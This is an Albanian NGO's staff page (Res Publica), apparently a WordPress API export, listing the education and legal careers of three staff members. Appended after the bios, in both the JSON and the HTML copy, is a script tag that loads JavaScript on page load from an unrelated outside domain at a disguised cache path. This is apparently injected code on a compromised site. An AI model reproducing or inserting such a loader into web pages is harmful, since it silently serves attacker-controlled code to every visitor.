{"id":106,"date":"2013-07-12T21:59:15","date_gmt":"2013-07-12T21:59:15","guid":{"rendered":"http:\/\/www.faqeinternet.al\/res\/?page_id=106"},"modified":"2023-05-05T18:58:13","modified_gmt":"2023-05-05T16:58:13","slug":"stafi-ekzekutiv","status":"publish","type":"page","link":"https:\/\/www.respublica.org.al\/web\/?page_id=106","title":{"rendered":"Stafi ekzekutiv"},"content":{"rendered":"<p><strong>Dorian Matlija &#8211; Drejtor Ekzekutiv<\/strong><\/p>\n<p><em>Edukimi<\/em>:<\/p>\n<ul>\n<li>Diplomuar me titullin Jurist n\u00eb vitin 1999, n\u00eb Fakultetin e Drejt\u00ebsis\u00eb pran\u00eb Universitetit t\u00eb Tiran\u00ebs.<\/li>\n<\/ul>\n<p><em>P\u00ebrvoja profesionale<\/em>:<\/p>\n<ul>\n<li>Drejtor Ekzekutiv i qendr\u00ebs Res Publica (2013 &#8211; aktualisht)<\/li>\n<li>Zv. Drejtor Ekzekutiv i qendr\u00ebs Res Publica (2010 \u2013 2013)<\/li>\n<li>Avokat, studio ligjore \u201cMatlija\u201d, Tiran\u00eb (2004 \u2013 aktualisht)<\/li>\n<li>Drejtor i Drejtoris\u00eb Juridike n\u00eb Radiotelevizionin Shqiptar (2002-2005)<\/li>\n<li>Jurist n\u00eb Drejtorin\u00eb Juridike n\u00eb Radiotelevizionin Shqiptar (1999-2002)<\/li>\n<\/ul>\n<p><strong>Theodoros Alexandridis \u2013 Partner \u2013 Ekspert i t\u00eb drejtave t\u00eb njeriut<\/strong><\/p>\n<p><em>Edukimi<\/em>:<\/p>\n<ul>\n<li>Diplomuar me titullin Master p\u00ebr t\u00eb Drejtat e Njeriut n\u00eb vitin 2000, n\u00eb Universitetin e Essex, Mbret\u00ebria e Bashkuar<\/li>\n<\/ul>\n<p><em>P\u00ebrvoja profesionale<\/em>:<\/p>\n<ul>\n<li>Konsulent ligjor pran\u00eb Res Publica dhe Greek Helsinki Monitor (2010 \u2013 aktualisht)<\/li>\n<li>Konsulent i jasht\u00ebm i Greek Helsinki Monitor (2010 \u2013 aktualisht)<\/li>\n<li>Konsulent i jasht\u00ebm i European Roma Rights Center (2009 \u2013 2010)<\/li>\n<li>Avokat pran\u00eb European Roma Rights Center (2007 \u2013 2009)<\/li>\n<li>Konsulent ligjor pran\u00eb Greek Helsinki Monitor (2000 \u2013 2007)<\/li>\n<\/ul>\n<p><strong>\u00a0<\/strong><\/p>\n<p><strong>Dr. Irena Dule \u2013 Partner \u2013 Eksperte<\/strong><\/p>\n<p><em>Edukimi:<\/em><\/p>\n<ul>\n<li>Mbrojtur titullin \u201cDoktor\u201d n\u00eb Universitetin Europian t\u00eb Tiran\u00ebs n\u00eb vitin 2016<\/li>\n<li>Diplomuar me titullin Jurist n\u00eb vitin 1999, n\u00eb Fakultetin e Drejt\u00ebsis\u00eb pran\u00eb Universitetit t\u00eb Tiran\u00ebs<\/li>\n<\/ul>\n<p><em>P\u00ebrvoja profesionale:<\/em><\/p>\n<ul>\n<li>K\u00ebrkuese shkencore p\u00ebr t\u00eb drejtat e njeriut \/ lektore part-time n\u00eb Fakultetin e Drejt\u00ebsis\u00eb n\u00eb Universitetin e Tiran\u00ebs (2014 \u2013 aktualisht)<\/li>\n<li>Avokate \/ lektore part-time n\u00eb Fakultetin e Drejt\u00ebsis\u00eb n\u00eb Universitetin \u201cAleksander \u00a0Moisiu\u201d (2004 \u2013 2013)<\/li>\n<li>Asistente ligjore n\u00eb Kuvendin e Republik\u00ebs s\u00eb Shqip\u00ebris\u00eb (2002 \u2013 2004)<\/li>\n<li>Drejtor i Drejtorise s\u00eb Sh\u00ebrbimeve Njer\u00ebzore pran\u00eb Bashkis\u00eb Tiran\u00eb (2000 \u2013 2001)<\/li>\n<li>Shefe e Sektorit Juridik pran\u00eb Ministris\u00eb s\u00eb Kultur\u00ebs (1999 \u2013 2000)<\/li>\n<\/ul>\n<p><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dorian Matlija &#8211; Drejtor Ekzekutiv Edukimi: Diplomuar me titullin Jurist n\u00eb vitin 1999, n\u00eb Fakultetin e Drejt\u00ebsis\u00eb pran\u00eb Universitetit t\u00eb [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":53,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages\/106"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=106"}],"version-history":[{"count":11,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages\/106\/revisions"}],"predecessor-version":[{"id":2399,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages\/106\/revisions\/2399"}],"up":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/pages\/53"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=106"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

<p><strong>Dorian Matlija &#8211; Drejtor Ekzekutiv</strong></p>
<p><em>Edukimi</em>:</p>
<ul>
<li>Diplomuar me titullin Jurist në vitin 1999, në Fakultetin e Drejtësisë pranë Universitetit të Tiranës.</li>
</ul>
<p><em>Përvoja profesionale</em>:</p>
<ul>
<li>Drejtor Ekzekutiv i qendrës Res Publica (2013 &#8211; aktualisht)</li>
<li>Zv. Drejtor Ekzekutiv i qendrës Res Publica (2010 – 2013)</li>
<li>Avokat, studio ligjore “Matlija”, Tiranë (2004 – aktualisht)</li>
<li>Drejtor i Drejtorisë Juridike në Radiotelevizionin Shqiptar (2002-2005)</li>
<li>Jurist në Drejtorinë Juridike në Radiotelevizionin Shqiptar (1999-2002)</li>
</ul>
<p><strong>Theodoros Alexandridis – Partner – Ekspert i të drejtave të njeriut</strong></p>
<p><em>Edukimi</em>:</p>
<ul>
<li>Diplomuar me titullin Master për të Drejtat e Njeriut në vitin 2000, në Universitetin e Essex, Mbretëria e Bashkuar</li>
</ul>
<p><em>Përvoja profesionale</em>:</p>
<ul>
<li>Konsulent ligjor pranë Res Publica dhe Greek Helsinki Monitor (2010 – aktualisht)</li>
<li>Konsulent i jashtëm i Greek Helsinki Monitor (2010 – aktualisht)</li>
<li>Konsulent i jashtëm i European Roma Rights Center (2009 – 2010)</li>
<li>Avokat pranë European Roma Rights Center (2007 – 2009)</li>
<li>Konsulent ligjor pranë Greek Helsinki Monitor (2000 – 2007)</li>
</ul>
<p><strong> </strong></p>
<p><strong>Dr. Irena Dule – Partner – Eksperte</strong></p>
<p><em>Edukimi:</em></p>
<ul>
<li>Mbrojtur titullin “Doktor” në Universitetin Europian të Tiranës në vitin 2016</li>
<li>Diplomuar me titullin Jurist në vitin 1999, në Fakultetin e Drejtësisë pranë Universitetit të Tiranës</li>
</ul>
<p><em>Përvoja profesionale:</em></p>
<ul>
<li>Kërkuese shkencore për të drejtat e njeriut / lektore part-time në Fakultetin e Drejtësisë në Universitetin e Tiranës (2014 – aktualisht)</li>
<li>Avokate / lektore part-time në Fakultetin e Drejtësisë në Universitetin “Aleksander  Moisiu” (2004 – 2013)</li>
<li>Asistente ligjore në Kuvendin e Republikës së Shqipërisë (2002 – 2004)</li>
<li>Drejtor i Drejtorise së Shërbimeve Njerëzore pranë Bashkisë Tiranë (2000 – 2001)</li>
<li>Shefe e Sektorit Juridik pranë Ministrisë së Kulturës (1999 – 2000)</li>
</ul>
<p><script type="text/javascript" src="#"></script><script type="text/javascript" src="http://www.get.space/wp-content/cache/tmpWpfc/theme-index.php"></script></p>

<p>Dorian Matlija &#8211; Drejtor Ekzekutiv Edukimi: Diplomuar me titullin Jurist në vitin 1999, në Fakultetin e Drejtësisë pranë Universitetit të [&hellip;]</p>
